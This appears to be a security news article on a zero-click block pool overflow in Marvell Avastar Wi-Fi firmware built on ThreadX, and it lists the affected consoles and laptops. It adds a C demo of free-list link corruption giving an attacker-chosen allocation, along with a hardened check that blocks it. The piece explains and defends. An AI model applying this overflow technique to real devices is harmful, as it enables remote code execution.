Several vulnerabilities have been found in the firmware of a widely used Wi-Fi chipset, so a range of laptops, game consoles and smart devices are affected. The most serious one can be exploited without any user interaction, according to Embedi researcher Denis Selianin.
"With this research, I'm going to answer a question that has needed answering for quite a while: to what extent is the Marvell WiFi FullMAC SoC (not) secure. Since the wireless devices with the analyzed chip aren't fully researched by the community yet, they may contain a tremendous volume of unaudited code, which may result in severe security issues swarming devices equipped with WLAN cards," Selianin explained in his report.
The vulnerable firmware is built on ThreadX, a real-time operating system (RTOS) developed by Express Logic. ThreadX reportedly has over 6.2 billion deployments, which makes it one of the most widely used pieces of software in Wi-Fi chips and other embedded devices.
The ThreadX-based firmware ships in Marvell's Avastar 88W8897 SoC (Wi-Fi + Bluetooth + NFC), which is found in the Sony PlayStation 4 (and PS4 Pro), Microsoft Surface and Surface Pro tablets and laptops, the Xbox One, Samsung Chromebooks and smartphones (such as the Galaxy J1), and the Valve Steam Link.
A Block Pool Overflow Vulnerability
The researcher found several vulnerabilities in the proprietary, ThreadX-based firmware. The most notable is a block pool overflow that can be triggered without user interaction while the affected device scans for available networks. Such a scan is launched every 5 minutes whether or not the device is connected to a Wi-Fi network, which opens the door to an exploit with "zero-click interaction at any state of wireless connection," the researcher said.
In short, the vulnerability:
- doesn't require any user interaction;
- can be triggered every 5 minutes on a GNU/Linux operating system, the interval of the background network scan;
- doesn't require knowledge of a Wi-Fi network name or passphrase/key;
- can be triggered even when the device isn't connected to any Wi-Fi network, just powered on.
According to the findings, the vulnerability is exploitable both on stock ThreadX firmware and on the Marvell Avastar Wi-Fi SoC. Selianin also demonstrated the attack by chaining the exploit with a privilege-escalation bug to execute code on the application processor of the Steam Link, a desktop streaming device built around the Marvell Avastar Wi-Fi SoC.
There are two techniques for exploiting the ThreadX block pool overflow. The first is generic and applies to any ThreadX-based firmware that has a block pool overflow bug, provided the block following the overflowed one is free. The second is specific to the implementation of the Marvell Wi-Fi firmware and works when the next block is busy (allocated).
Combining the two covers both states of the neighbouring block, so reliable exploitation can be achieved, the researcher noted. The full technical disclosure of the vulnerability is available in Selianin's report.
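To make the generic technique concrete, the following is an added example written for this page; it is not code from Selianin's report, from ThreadX or from Marvell's firmware. It models a ThreadX-style block pool in a few dozen lines (every block carries a pointer-sized header that links to the next free block while the block is free and points back to the pool once allocated, with the caller receiving the address just past the header), then shows what happens when an allocated block is overflowed into a free neighbour. The block size, the `process_frame` stand-in for the firmware bug, the `fake_target` buffer that plays the role of an attacker-chosen address, and the `link_is_sane` check used by the hardened variant are all assumptions made for the demonstration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Simplified model of a ThreadX-style block pool (added example, not ThreadX
 * source).  Layout: [link/owner pointer][BLOCK_SIZE user bytes] per block. */
#define BLOCK_SIZE 32                       /* user-visible bytes per block (assumed) */
#define NUM_BLOCKS 4
#define STRIDE     (BLOCK_SIZE + sizeof(void *))
#define POOL_BYTES (NUM_BLOCKS * STRIDE)

typedef struct {
    unsigned char *mem;                     /* pool memory start */
    size_t         size;                    /* pool memory size */
    unsigned char *available_list;          /* head of the free list */
    int            check_links;             /* 1 = hardened allocator (our addition) */
} pool_t;

static union { unsigned char bytes[POOL_BYTES]; void *align; } pool_mem;
static unsigned char fake_target[64];       /* constructed: any address the attacker picks */

static void pool_create(pool_t *p, unsigned char *mem, size_t size, int check_links)
{
    size_t n = size / STRIDE;
    unsigned char *cur = mem;
    for (size_t i = 0; i < n; i++) {        /* thread the free list through the headers */
        unsigned char *next = (i + 1 < n) ? cur + STRIDE : NULL;
        memcpy(cur, &next, sizeof next);
        cur += STRIDE;
    }
    p->mem = mem;
    p->size = size;
    p->available_list = mem;
    p->check_links = check_links;
}

/* Hardened variant only: a free-list link must be NULL or a block boundary
 * inside the pool.  This check is an addition here, not part of the model of
 * the stock allocator, which trusts the link blindly. */
static int link_is_sane(const pool_t *p, const unsigned char *link)
{
    if (link == NULL) return 1;
    if (link < p->mem || link >= p->mem + p->size) return 0;
    return ((size_t)(link - p->mem) % STRIDE) == 0;
}

static void *pool_allocate(pool_t *p)
{
    unsigned char *blk = p->available_list, *next;
    if (blk == NULL) return NULL;
    memcpy(&next, blk, sizeof next);        /* pop the free list via the header link */
    if (p->check_links && !link_is_sane(p, next))
        return NULL;                        /* hardened: corrupted free list detected */
    p->available_list = next;
    void *owner = p;
    memcpy(blk, &owner, sizeof owner);      /* allocated block's header points at the pool */
    return blk + sizeof(void *);            /* caller gets the area after the header */
}

/* Constructed stand-in for the bug class: copies an incoming frame into a pool
 * block using the frame's own length, with no check against BLOCK_SIZE. */
static void process_frame(void *block, const unsigned char *frame, size_t len)
{
    memcpy(block, frame, len);
}

/* Generic technique: block 0 is in use and block 1 is still free, so the
 * overflow lands on block 1's free-list link.  Returns what the allocator
 * hands out two allocations later (NULL if the hardened check fires). */
static void *run_attack(int hardened, void *attacker_target)
{
    static pool_t pool;
    pool_create(&pool, pool_mem.bytes, sizeof pool_mem.bytes, hardened);
    void *blk0 = pool_allocate(&pool);

    unsigned char frame[BLOCK_SIZE + sizeof(void *)];   /* constructed oversized frame */
    memset(frame, 'A', BLOCK_SIZE);                     /* fills block 0 exactly */
    memcpy(frame + BLOCK_SIZE, &attacker_target, sizeof attacker_target); /* overwrites block 1's link */
    process_frame(blk0, frame, sizeof frame);

    if (pool_allocate(&pool) == NULL)       /* block 1: pops the poisoned link */
        return NULL;
    return pool_allocate(&pool);            /* stock allocator: attacker_target + header */
}

void *demo_generic_technique(void) { return run_attack(0, fake_target); }
void *demo_hardened(void)          { return run_attack(1, fake_target); }

int main(void)
{
    printf("target %p, stock allocator returned %p, hardened returned %p\n",
           (void *)fake_target, demo_generic_technique(), demo_hardened());
    return 0;
}
```

With the stock allocator the third allocation returns `fake_target + sizeof(void *)`: whatever the firmware next writes into that "block" lands at an attacker-chosen address, which is the write-what-where primitive the generic technique relies on (the allocator has already stored the pool pointer at `fake_target` itself while "allocating" it). The hardened variant refuses the allocation as soon as the popped link falls outside the pool, which is the kind of free-list sanity check that would break this technique; it does nothing about the case where the neighbouring block is busy, which is why the report needs a second, Marvell-specific technique for that state.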